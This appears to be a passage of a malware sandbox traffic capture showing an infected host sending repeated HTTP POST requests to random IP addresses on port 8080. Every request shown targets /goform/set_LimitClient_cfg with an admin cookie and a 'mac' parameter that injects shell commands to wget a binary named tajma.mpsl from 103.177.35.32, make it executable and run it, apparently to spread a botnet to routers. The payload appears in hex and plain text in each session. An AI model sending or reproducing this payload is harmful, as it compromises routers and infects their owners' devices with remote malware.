                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2121192.168.2.2359132217.146.205.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431104898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2122192.168.2.233994259.87.20.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431124926 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2123192.168.2.2353456179.101.71.198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431142092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2124192.168.2.2352858110.171.28.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431158066 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2125192.168.2.233489085.122.40.1388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431170940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2126192.168.2.23520269.115.250.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431190968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2127192.168.2.233395498.171.126.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431204081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2128192.168.2.234008613.112.33.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431214094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2129192.168.2.2351640219.135.178.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431571960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2130192.168.2.233657218.34.1.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431571960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2131192.168.2.235378096.69.195.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431591988 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2132192.168.2.2357746110.82.69.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431612015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2133192.168.2.2343912191.200.173.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431628942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2134192.168.2.233314643.175.75.788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431759119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2135192.168.2.233893095.68.234.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431763887 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2136192.168.2.233768027.52.53.1218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431777000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2137192.168.2.2338132194.206.143.1028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431818962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2138192.168.2.2340260117.205.25.1118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431833029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2139192.168.2.2345510168.86.95.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431859016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2140192.168.2.2339120117.79.209.518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431900024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2141192.168.2.2344224202.28.152.2318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431905985 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2142192.168.2.233624691.244.16.1658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431909084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2143192.168.2.2341044183.93.17.2158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.431952953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
